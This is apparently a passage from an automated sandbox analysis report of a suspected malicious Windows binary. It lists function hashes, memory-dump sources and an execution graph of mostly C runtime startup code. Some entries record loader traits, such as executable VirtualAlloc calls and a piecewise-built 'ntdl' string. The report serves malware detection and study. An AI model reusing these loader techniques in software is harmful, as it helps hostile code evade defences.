                                                                                  • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                  • Instruction ID: 5a6746c97295149a35701c6ff1caf6a781713c48e9201cce5e2efa4a5d21df44
                                                                                  • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                                                                  • Instruction Fuzzy Hash: B4112B32A18B8182EB218B59E44026977E5FB88B94F588230DF8D07B59DF3DD562CB00
                                                                                  Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimerWaitable
                                                                                  • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                                  • API String ID: 1823812067-3336177065
                                                                                  • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                  • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                                                                  • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                                                                  • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                                                                  Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$FreeProcess
                                                                                  • String ID:
                                                                                  • API String ID: 3859560861-0
                                                                                  • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                  • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                                                                  • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                                                                  • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                                                                  Executed Functions

                                                                                  Function 02BD017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02BD01DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000027.00000003.3033872957.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_39_3_2bd0000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                  • Instruction ID: 849d5d0d529b39a55d7d9ecf3e15e97486a3383a82e5f25cd10e1bfc43ed2a4c
                                                                                  • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                  • Instruction Fuzzy Hash: FEA14870A01606EFDB14DFA9C880BAEB7B5FF48318F1884A9E455DB251E770EA51CF90
                                                                                  Function 02BD044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02BD048B
                                                                                  • VirtualFree.KERNELBASE(?,?,00004000), ref: 02BD04F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000027.00000003.3033872957.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_39_3_2bd0000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree
                                                                                  • String ID:
                                                                                  • API String ID: 2087232378-0
                                                                                  • Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                  • Instruction ID: a62cfdbc43ae936e82700f12a65f78742a972baeadd02b102a240af1ffb8b303
                                                                                  • Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
                                                                                  • Instruction Fuzzy Hash: 2021DE75900305BBD720BE948C84FEFB7F9DF44314F144CA8EA5AA2181E771B5109A60

                                                                                  Non-executed Functions

                                                                                  Function 02BD00CD Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000027.00000003.3033872957.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_39_3_2bd0000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: l$ntdl
                                                                                  • API String ID: 0-924918826
                                                                                  • Opcode ID: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                  • Instruction ID: c7a639adfaec7c3ce883ff70ed48a19b26cafc5f743d579dcdbecdaee84ab9d6
                                                                                  • Opcode Fuzzy Hash: 6c9c6db97d8771c7cf8e0db104e1040736491d6c0939765109556fa2b78a9631
                                                                                  • Instruction Fuzzy Hash: E9119DB5700A05BFCB15EF18C418A4EBBF6FF88710B6185A9E00997710FB34EA218BD5
                                                                                  Function 02BD0643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000027.00000003.3033872957.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_39_3_2bd0000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: l$ntdl
                                                                                  • API String ID: 0-924918826
                                                                                  • Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                  • Instruction ID: ada0fff7deea67f607a13a6bbc5bd03cc3bc0c938b67a7e68aa7bc974e5edcdc
                                                                                  • Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
                                                                                  • Instruction Fuzzy Hash: E4018475B00214AFCB04EF99D845DAEFBB9EF88754F044499F904A7361EA70DE008BA5

                                                                                  Execution Graph

                                                                                  Execution Coverage:6%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:1.3%
                                                                                  Total number of Nodes:1047
                                                                                  Total number of Limit Nodes:29
                                                                                  execution_graph 3909 331391 3910 3313cd 3909->3910 3911 3313a3 3909->3911 3911->3910 3913 3328da 3911->3913 3914 3328e6 __freefls@4 3913->3914 3919 332345 3914->3919 3920 3322cc __getptd_noexit 66 API calls 3919->3920 3921 33234d 3920->3921 3922 33235a 3921->3922 3923 331411 __amsg_exit 66 API calls 3921->3923 3924 3351fb 3922->3924 3923->3922 3925 335221 3924->3925 3926 33521a 3924->3926 3936 332f92 3925->3936 3927 331719 __NMSG_WRITE 66 API calls 3926->3927 3927->3925 3931 33530a 3960 331697 3931->3960 3933 335232 __crtGetStringTypeA_stat 3933->3931 3935 3352ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3933->3935 3935->3931 3937 3320f9 __decode_pointer 6 API calls 3936->3937 3938 332f9d 3937->3938 3938->3933 3939 332f9f 3938->3939 3943 332fab __freefls@4 3939->3943 3940 333007 3941 332fe8 3940->3941 3946 333016 3940->3946 3945 3320f9 __decode_pointer 6 API calls 3941->3945 3942 332fd2 3944 3322cc __getptd_noexit 66 API calls 3942->3944 3943->3940 3943->3941 3943->3942 3949 332fce 3943->3949 3947 332fd7 _siglookup 3944->3947 3945->3947 3948 332c72 __mtinitlocknum 66 API calls 3946->3948 3951 33307d 3947->3951 3953 331697 _raise 66 API calls 3947->3953 3959 332fe0 __freefls@4 3947->3959 3950 33301b 3948->3950 3949->3942 3949->3946 3952 332c0a __calloc_impl 6 API calls 3950->3952 3954 332aa0 __lock 66 API calls 3951->3954 3956 333088 3951->3956 3952->3959 3953->3951 3954->3956 3955 3320f0 __init_pointers 6 API calls 3957 3330bd 3955->3957 3956->3955 3956->3957 3963 333113 3957->3963 3959->3933 3961 331555 _doexit 66 API calls 3960->3961 3962 3316a8 3961->3962 3964 333120 3963->3964 3965 333119 3963->3965 3964->3959 3967 3329c6 LeaveCriticalSection 3965->3967 3967->3964 3871 3326b0 3872 3326e9 3871->3872 3873 3326dc 3871->3873 3875 3310cc __crtGetStringTypeA_stat 5 API calls 3872->3875 3874 3310cc __crtGetStringTypeA_stat 5 API calls 3873->3874 3874->3872 3881 3326f9 __except_handler4 __IsNonwritableInCurrentImage 3875->3881 3876 33277c 3877 332752 __except_handler4 3877->3876 3878 33276c 3877->3878 3879 3310cc __crtGetStringTypeA_stat 5 API calls 3877->3879 3880 3310cc __crtGetStringTypeA_stat 5 API calls 3878->3880 3879->3878 3880->3876 3881->3876 3881->3877 3887 3351ca RtlUnwind 3881->3887 3883 3327cb __except_handler4 3884 3327ff 3883->3884 3886 3310cc __crtGetStringTypeA_stat 5 API calls 3883->3886 3885 3310cc __crtGetStringTypeA_stat 5 API calls 3884->3885 3885->3877 3886->3884 3887->3883 3888 3331b4 3889 3331c0 SetLastError 3888->3889 3890 3331c8 __freefls@4 3888->3890 3889->3890 3891 335138 3892 33514a 3891->3892 3893 335158 @_EH4_CallFilterFunc@8 3891->3893 3894 3310cc __crtGetStringTypeA_stat 5 API calls 3892->3894 3894->3893 3895 332d3f 3896 333730 __calloc_crt 66 API calls 3895->3896 3897 332d4b 3896->3897 3898 33207e __encode_pointer 6 API calls 3897->3898 3899 332d53 3898->3899 3987 33235f 3989 33236b __freefls@4 3987->3989 3988 332383 3992 3335ee __freefls@4 66 API calls 3988->3992 3996 332391 3988->3996 3989->3988 3990 33246d __freefls@4 3989->3990 3991 3335ee __freefls@4 66 API calls 3989->3991 3991->3988 3992->3996 3993 3335ee __freefls@4 66 API calls 3994 33239f 3993->3994 3995 3323ad 3994->3995 3997 3335ee __freefls@4 66 API calls 3994->3997 3998 3323bb 3995->3998 3999 3335ee __freefls@4 66 API calls 3995->3999 3996->3993 3996->3994 3997->3995 4000 3323c9 3998->4000 4001 3335ee __freefls@4 66 API calls 3998->4001 3999->3998 4002 3323d7 4000->4002 4003 3335ee __freefls@4 66 API calls 4000->4003 4001->4000 4004 3323e8 4002->4004 4005 3335ee __freefls@4 66 API calls 4002->4005 4003->4002 4006 332aa0 __lock 66 API calls 4004->4006 4005->4004 4007 3323f0 4006->4007 4008 332415 4007->4008 4009 3323fc InterlockedDecrement 4007->4009 4023 332479 4008->4023 4009->4008 4010 332407 4009->4010 4010->4008 4014 3335ee __freefls@4 66 API calls 4010->4014 4013 332aa0 __lock 66 API calls 4015 332429 4013->4015 4014->4008 4016 33245a 4015->4016 4026 333d2d 4015->4026 4070 332485 4016->4070 4020 3335ee __freefls@4 66 API calls 4020->3990 4073 3329c6 LeaveCriticalSection 4023->4073 4025 332422 4025->4013 4027 33243e 4026->4027 4028 333d3e InterlockedDecrement 4026->4028 4027->4016 4040 333b55 4027->4040 4029 333d53 InterlockedDecrement 4028->4029 4030 333d56 4028->4030 4029->4030 4031 333d63 4030->4031 4032 333d60 InterlockedDecrement 4030->4032 4033 333d70 4031->4033 4034 333d6d InterlockedDecrement 4031->4034 4032->4031 4035 333d7a InterlockedDecrement 4033->4035 4036 333d7d 4033->4036 4034->4033 4035->4036 4037 333d96 InterlockedDecrement 4036->4037 4038 333da6 InterlockedDecrement 4036->4038 4039 333db1 InterlockedDecrement 4036->4039 4037->4036 4038->4036 4039->4027 4041 333b6c 4040->4041 4042 333bd9 4040->4042 4041->4042 4049 333ba0 4041->4049 4053 3335ee __freefls@4 66 API calls 4041->4053 4043 333c26 4042->4043 4044 3335ee __freefls@4 66 API calls 4042->4044 4059 333c4d 4043->4059 4098 335ae1 4043->4098 4046 333bfa 4044->4046 4050 3335ee __freefls@4 66 API calls 4046->4050 4048 333bc1 4051 3335ee __freefls@4 66 API calls 4048->4051 4049->4048 4056 3335ee __freefls@4 66 API calls 4049->4056 4055 333c0d 4050->4055 4060 333bce 4051->4060 4052 333c92 4061 3335ee __freefls@4 66 API calls 4052->4061 4062 333b95 4053->4062 4054 3335ee __freefls@4 66 API calls 4054->4059 4058 3335ee __freefls@4 66 API calls 4055->4058 4063 333bb6 4056->4063 4057 3335ee 66 API calls __freefls@4 4057->4059 4064 333c1b 4058->4064 4059->4052 4059->4057 4065 3335ee __freefls@4 66 API calls 4060->4065 4066 333c98 4061->4066 4074 335cbb 4062->4074 4090 335c76 4063->4090 4069 3335ee __freefls@4 66 API calls 4064->4069 4065->4042 4066->4016 4069->4043 4186 3329c6 LeaveCriticalSection 4070->4186 4072 332467 4072->4020 4073->4025 4075 335cc8 4074->4075 4089 335d45 4074->4089 4076 335cd9 4075->4076 4077 3335ee __freefls@4 66 API calls 4075->4077 4078 3335ee __freefls@4 66 API calls 4076->4078 4079 335ceb 4076->4079 4077->4076 4078->4079 4080 335cfd 4079->4080 4082 3335ee __freefls@4 66 API calls 4079->4082 4081 335d0f 4080->4081 4083 3335ee __freefls@4 66 API calls 4080->4083 4084 335d21 4081->4084 4085 3335ee __freefls@4 66 API calls 4081->4085 4082->4080 4083->4081 4086 335d33 4084->4086 4087 3335ee __freefls@4 66 API calls 4084->4087 4085->4084 4088 3335ee __freefls@4 66 API calls 4086->4088 4086->4089 4087->4086 4088->4089 4089->4049 4091 335c83 4090->4091 4097 335cb7 4090->4097 4092 335c93 4091->4092 4093 3335ee __freefls@4 66 API calls 4091->4093 4094 3335ee __freefls@4 66 API calls 4092->4094 4095 335ca5 4092->4095 4093->4092 4094->4095 4096 3335ee __freefls@4 66 API calls 4095->4096 4095->4097 4096->4097 4097->4048 4099 335af2 4098->4099 4185 333c46 4098->4185 4100 3335ee __freefls@4 66 API calls 4099->4100 4101 335afa 4100->4101 4102 3335ee __freefls@4 66 API calls 4101->4102 4103 335b02 4102->4103 4104 3335ee __freefls@4 66 API calls 4103->4104 4105 335b0a 4104->4105 4106 3335ee __freefls@4 66 API calls 4105->4106 4107 335b12 4106->4107 4108 3335ee __freefls@4 66 API calls 4107->4108 4109 335b1a 4108->4109 4110 3335ee __freefls@4 66 API calls 4109->4110 4111 335b22 4110->4111 4112 3335ee __freefls@4 66 API calls 4111->4112 4113 335b29 4112->4113 4114 3335ee __freefls@4 66 API calls 4113->4114 4115 335b31 4114->4115 4116 3335ee __freefls@4 66 API calls 4115->4116 4117 335b39 4116->4117 4118 3335ee __freefls@4 66 API calls 4117->4118 4119 335b41 4118->4119 4120 3335ee __freefls@4 66 API calls 4119->4120 4121 335b49 4120->4121 4122 3335ee __freefls@4 66 API calls 4121->4122 4123 335b51 4122->4123 4124 3335ee __freefls@4 66 API calls 4123->4124 4125 335b59 4124->4125 4126 3335ee __freefls@4 66 API calls 4125->4126 4127 335b61 4126->4127 4128 3335ee __freefls@4 66 API calls 4127->4128 4129 335b69 4128->4129 4130 3335ee __freefls@4 66 API calls 4129->4130 4131 335b71 4130->4131 4132 3335ee __freefls@4 66 API calls 4131->4132 4133 335b7c 4132->4133 4134 3335ee __freefls@4 66 API calls 4133->4134 4135 335b84 4134->4135 4136 3335ee __freefls@4 66 API calls 4135->4136 4137 335b8c 4136->4137 4138 3335ee __freefls@4 66 API calls 4137->4138 4139 335b94 4138->4139 4140 3335ee __freefls@4 66 API calls 4139->4140 4141 335b9c 4140->4141 4142 3335ee __freefls@4 66 API calls 4141->4142 4143 335ba4 4142->4143 4144 3335ee __freefls@4 66 API calls 4143->4144 4145 335bac 4144->4145 4146 3335ee __freefls@4 66 API calls 4145->4146 4147 335bb4 4146->4147 4148 3335ee __freefls@4 66 API calls 4147->4148 4149 335bbc 4148->4149 4150 3335ee __freefls@4 66 API calls 4149->4150 4151 335bc4 4150->4151 4152 3335ee __freefls@4 66 API calls 4151->4152 4153 335bcc 4152->4153 4154 3335ee __freefls@4 66 API calls 4153->4154 4155 335bd4 4154->4155 4156 3335ee __freefls@4 66 API calls 4155->4156 4157 335bdc 4156->4157 4158 3335ee __freefls@4 66 API calls 4157->4158 4159 335be4 4158->4159 4160 3335ee __freefls@4 66 API calls 4159->4160 4161 335bec 4160->4161 4162 3335ee __freefls@4 66 API calls 4161->4162 4163 335bf4 4162->4163 4164 3335ee __freefls@4 66 API calls 4163->4164 4165 335c02 4164->4165 4166 3335ee __freefls@4 66 API calls 4165->4166 4167 335c0d 4166->4167 4168 3335ee __freefls@4 66 API calls 4167->4168 4169 335c18 4168->4169 4170 3335ee __freefls@4 66 API calls 4169->4170 4171 335c23 4170->4171 4172 3335ee __freefls@4 66 API calls 4171->4172 4173 335c2e 4172->4173 4174 3335ee __freefls@4 66 API calls 4173->4174 4175 335c39 4174->4175 4176 3335ee __freefls@4 66 API calls 4175->4176 4177 335c44 4176->4177 4178 3335ee __freefls@4 66 API calls 4177->4178 4179 335c4f 4178->4179 4180 3335ee __freefls@4 66 API calls 4179->4180 4181 335c5a 4180->4181 4182 3335ee __freefls@4 66 API calls 4181->4182 4183 335c65 4182->4183 4184 3335ee __freefls@4 66 API calls 4183->4184 4184->4185 4185->4054 4186->4072 3979 3328fe 3980 332901 3979->3980 3981 3351fb _abort 68 API calls 3980->3981 3982 33290d __freefls@4 3981->3982 3900 33543d 3901 331411 __amsg_exit 66 API calls 3900->3901 3902 335444 3901->3902 4187 331242 4188 331251 4187->4188 4189 331257 4187->4189 4191 331697 _raise 66 API calls 4188->4191 4193 3316bc 4189->4193 4191->4189 4192 33125c __freefls@4 4194 331555 _doexit 66 API calls 4193->4194 4195 3316c7 4194->4195 4195->4192 3968 331281 3971 33283c 3968->3971 3970 331286 3970->3970 3972 332861 3971->3972 3973 33286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3971->3973 3972->3973 3974 332865 3972->3974 3973->3974 3974->3970 4196 334247 4206 3341cb 4196->4206 4199 334272 setSBCS 4200 3310cc __crtGetStringTypeA_stat 5 API calls 4199->4200 4201 33442a 4200->4201 4202 3342b6 IsValidCodePage 4202->4199 4203 3342c8 GetCPInfo 4202->4203 4203->4199 4204 3342db __setmbcp_nolock __crtGetStringTypeA_stat 4203->4204 4213 333f0d GetCPInfo 4204->4213 4223 334144 4206->4223 4209 3341ea GetOEMCP 4212 3341fa 4209->4212 4210 334208 4211 33420d GetACP 4210->4211 4210->4212 4211->4212 4212->4199 4212->4202 4212->4204 4216 333f41 __crtGetStringTypeA_stat 4213->4216 4222 333ff3 4213->4222 4278 335fe2 4216->4278 4218 3310cc __crtGetStringTypeA_stat 5 API calls 4220 33409e 4218->4220 4220->4204 4221 336415 ___crtLCMapStringA 101 API calls 4221->4222 4222->4218 4224 334157 4223->4224 4228 3341a4 4223->4228 4225 332345 __getptd 66 API calls 4224->4225 4226 33415c 4225->4226 4227 334184 4226->4227 4231 333e04 4226->4231 4227->4228 4246 3340a0 4227->4246 4228->4209 4228->4210 4232 333e10 __freefls@4 4231->4232 4233 332345 __getptd 66 API calls 4232->4233 4234 333e15 4233->4234 4235 333e43 4234->4235 4236 333e27 4234->4236 4237 332aa0 __lock 66 API calls 4235->4237 4238 332345 __getptd 66 API calls 4236->4238 4239 333e4a 4237->4239 4240 333e2c 4238->4240 4262 333dc6 4239->4262 4244 333e3a __freefls@4 4240->4244 4245 331411 __amsg_exit 66 API calls 4240->4245 4244->4227 4245->4244 4247 3340ac __freefls@4 4246->4247 4248 332345 __getptd 66 API calls 4247->4248 4249 3340b1 4248->4249 4250 3340c3 4249->4250 4251 332aa0 __lock 66 API calls 4249->4251 4254 3340d1 __freefls@4 4250->4254 4258 331411 __amsg_exit 66 API calls 4250->4258 4252 3340e1 4251->4252 4253 33412a 4252->4253 4255 334112 InterlockedIncrement 4252->4255 4256 3340f8 InterlockedDecrement 4252->4256 4274 33413b 4253->4274 4254->4228 4255->4253 4256->4255 4259 334103 4256->4259 4258->4254 4259->4255 4260 3335ee __freefls@4 66 API calls 4259->4260 4261 334111 4260->4261 4261->4255 4263 333dca 4262->4263 4264 333dfc 4262->4264 4263->4264 4265 333c9e ___addlocaleref 8 API calls 4263->4265 4270 333e6e 4264->4270 4266 333ddd 4265->4266 4266->4264 4267 333d2d ___removelocaleref 8 API calls 4266->4267 4268 333de8 4267->4268 4268->4264 4269 333b55 ___freetlocinfo 66 API calls 4268->4269 4269->4264 4273 3329c6 LeaveCriticalSection 4270->4273 4272 333e75 4272->4240 4273->4272 4277 3329c6 LeaveCriticalSection 4274->4277 4276 334142 4276->4250 4277->4276 4279 334144 _LocaleUpdate::_LocaleUpdate 76 API calls 4278->4279 4280 335ff5 4279->4280 4288 335e28 4280->4288 4283 336415 4284 334144 _LocaleUpdate::_LocaleUpdate 76 API calls 4283->4284 4285 336428 4284->4285 4376 336070 4285->4376 4289 335e74 4288->4289 4290 335e49 GetStringTypeW 4288->4290 4291 335e61 4289->4291 4293 335f5b 4289->4293 4290->4291 4292 335e69 GetLastError 4290->4292 4294 335ead MultiByteToWideChar 4291->4294 4311 335f55 4291->4311 4292->4289 4316 336b1a GetLocaleInfoA 4293->4316 4299 335eda 4294->4299 4294->4311 4296 3310cc __crtGetStringTypeA_stat 5 API calls 4298 333fae 4296->4298 4298->4283 4300 335eef __alloca_probe_16 __crtGetStringTypeA_stat 4299->4300 4303 3354b5 _malloc 66 API calls 4299->4303 4305 335f28 MultiByteToWideChar 4300->4305 4300->4311 4301 335fac GetStringTypeA 4302 335fc7 4301->4302 4301->4311 4306 3335ee __freefls@4 66 API calls 4302->4306 4303->4300 4307 335f4f 4305->4307 4308 335f3e GetStringTypeW 4305->4308 4306->4311 4312 335446 4307->4312 4308->4307 4311->4296 4313 335452 4312->4313 4314 335463 4312->4314 4313->4314 4315 3335ee __freefls@4 66 API calls 4313->4315 4314->4311 4315->4314 4317 336b48 4316->4317 4318 336b4d 4316->4318 4320 3310cc __crtGetStringTypeA_stat 5 API calls 4317->4320 4347 336b04 4318->4347 4321 335f7f 4320->4321 4321->4301 4321->4311 4322 336b63 4321->4322 4323 336ba3 GetCPInfo 4322->4323 4324 336c2d 4322->4324 4325 336bba 4323->4325 4326 336c18 MultiByteToWideChar 4323->4326 4327 3310cc __crtGetStringTypeA_stat 5 API calls 4324->4327 4325->4326 4328 336bc0 GetCPInfo 4325->4328 4326->4324 4331 336bd3 _strlen 4326->4331 4329 335fa0 4327->4329 4328->4326 4330 336bcd 4328->4330 4329->4301 4329->4311 4330->4326 4330->4331 4332 3354b5 _malloc 66 API calls 4331->4332 4336 336c05 __alloca_probe_16 __crtGetStringTypeA_stat 4331->4336 4332->4336 4333 336c62 MultiByteToWideChar 4334 336c7a 4333->4334 4335 336c99 4333->4335 4338 336c81 WideCharToMultiByte 4334->4338 4339 336c9e 4334->4339 4337 335446 __freea 66 API calls 4335->4337 4336->4324 4336->4333 4337->4324 4338->4335 4340 336ca9 WideCharToMultiByte 4339->4340 4341 336cbd 4339->4341 4340->4335 4340->4341 4342 333730 __calloc_crt 66 API calls 4341->4342 4343 336cc5 4342->4343 4343->4335 4344 336cce WideCharToMultiByte 4343->4344 4344->4335 4345 336ce0 4344->4345 4346 3335ee __freefls@4 66 API calls 4345->4346 4346->4335 4350 336f7a 4347->4350 4351 336f93 4350->4351 4354 336d4b 4351->4354 4355 334144 _LocaleUpdate::_LocaleUpdate 76 API calls 4354->4355 4358 336d60 4355->4358 4356 336d72 4357 332c72 __mtinitlocknum 66 API calls 4356->4357 4359 336d77 4357->4359 4358->4356 4361 336daf 4358->4361 4360 332c0a __calloc_impl 6 API calls 4359->4360 4364 336b15 4360->4364 4363 336df4 4361->4363 4366 3369e5 4361->4366 4363->4364 4365 332c72 __mtinitlocknum 66 API calls 4363->4365 4364->4317 4365->4364 4367 334144 _LocaleUpdate::_LocaleUpdate 76 API calls 4366->4367 4368 3369f9 4367->4368 4372 336a06 4368->4372 4373 336acc 4368->4373 4371 335fe2 ___crtGetStringTypeA 90 API calls 4371->4372 4372->4361 4374 334144 _LocaleUpdate::_LocaleUpdate 76 API calls 4373->4374 4375 336a2e 4374->4375 4375->4371 4377 336091 LCMapStringW 4376->4377 4380 3360ac 4376->4380 4378 3360b4 GetLastError 4377->4378 4377->4380 4378->4380 4379 3362aa 4382 336b1a ___ansicp 90 API calls 4379->4382 4380->4379 4381 336106 4380->4381 4383 33611f MultiByteToWideChar 4381->4383 4397 3362a1 4381->4397 4384 3362d2 4382->4384 4389 33614c 4383->4389 4383->4397 4387 3363c6 LCMapStringA 4384->4387 4388 3362eb 4384->4388 4384->4397 4385 3310cc __crtGetStringTypeA_stat 5 API calls 4386 333fce 4385->4386 4386->4221 4403 336322 4387->4403 4390 336b63 ___convertcp 73 API calls 4388->4390 4392 3354b5 _malloc 66 API calls 4389->4392 4402 336165 __alloca_probe_16 4389->4402 4393 3362fd 4390->4393 4391 33619d MultiByteToWideChar 4394 3361b6 LCMapStringW 4391->4394 4395 336298 4391->4395 4392->4402 4393->4397 4399 336307 LCMapStringA 4393->4399 4394->4395 4401 3361d7 4394->4401 4400 335446 __freea 66 API calls 4395->4400 4396 3335ee __freefls@4 66 API calls 4398 3363ed 4396->4398 4397->4385 4398->4397 4405 3335ee __freefls@4 66 API calls 4398->4405 4399->4403 4409 336329 4399->4409 4400->4397 4404 3361e0 4401->4404 4408 336209 4401->4408 4402->4391 4402->4397 4403->4396 4403->4398 4404->4395 4406 3361f2 LCMapStringW 4404->4406 4405->4397 4406->4395 4407 336258 LCMapStringW 4410 336292 4407->4410 4411 336270 WideCharToMultiByte 4407->4411 4413 336224 __alloca_probe_16 4408->4413 4415 3354b5 _malloc 66 API calls 4408->4415 4412 3354b5 _malloc 66 API calls 4409->4412 4414 33633a __alloca_probe_16 __crtGetStringTypeA_stat 4409->4414 4416 335446 __freea 66 API calls 4410->4416 4411->4410 4412->4414 4413->4395 4413->4407 4414->4403 4417 336378 LCMapStringA 4414->4417 4415->4413 4416->4395 4419 336394 4417->4419 4420 336398 4417->4420 4422 335446 __freea 66 API calls 4419->4422 4421 336b63 ___convertcp 73 API calls 4420->4421 4421->4419 4422->4403 3183 331104 3220 33264c 3183->3220 3185 331110 GetStartupInfoW 3187 331133 3185->3187 3221 33261b HeapCreate 3187->3221 3189 331183 3223 33248e GetModuleHandleW 3189->3223 3192 331194 __RTC_Initialize 3257 331dde 3192->3257 3194 3310db _fast_error_exit 66 API calls 3194->3192 3196 3311a2 3197 3311ae GetCommandLineW 3196->3197 3331 331411 3196->3331 3272 331d81 GetEnvironmentStringsW 3197->3272 3200 3311bd 3281 331cd3 GetModuleFileNameW 3200->3281 3204 3311d2 3287 331aa4 3204->3287 3205 331411 __amsg_exit 66 API calls 3205->3204 3208 3311e3 3300 3314d0 3208->3300 3209 331411 __amsg_exit 66 API calls 3209->3208 3211 3311ea 3212 331411 __amsg_exit 66 API calls 3211->3212 3213 3311f5 __wwincmdln 3211->3213 3212->3213 3306 331000 CoInitialize CreateMutexW 3213->3306 3215 331216 3216 331224 3215->3216 3320 331681 3215->3320 3338 3316ad 3216->3338 3219 331229 __freefls@4 3220->3185 3222 331177 3221->3222 3222->3189 3323 3310db 3222->3323 3224 3324a2 3223->3224 3225 3324a9 3223->3225 3341 3313e1 3224->3341 3227 3324b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3225->3227 3228 332611 3225->3228 3229 3324fc TlsAlloc 3227->3229 3400 3321a8 3228->3400 3233 331189 3229->3233 3234 33254a TlsSetValue 3229->3234 3233->3192 3233->3194 3234->3233 3235 33255b 3234->3235 3345 3316cb 3235->3345 3240 33207e __encode_pointer 6 API calls 3241 33257b 3240->3241 3242 33207e __encode_pointer 6 API calls 3241->3242 3243 33258b 3242->3243 3244 33207e __encode_pointer 6 API calls 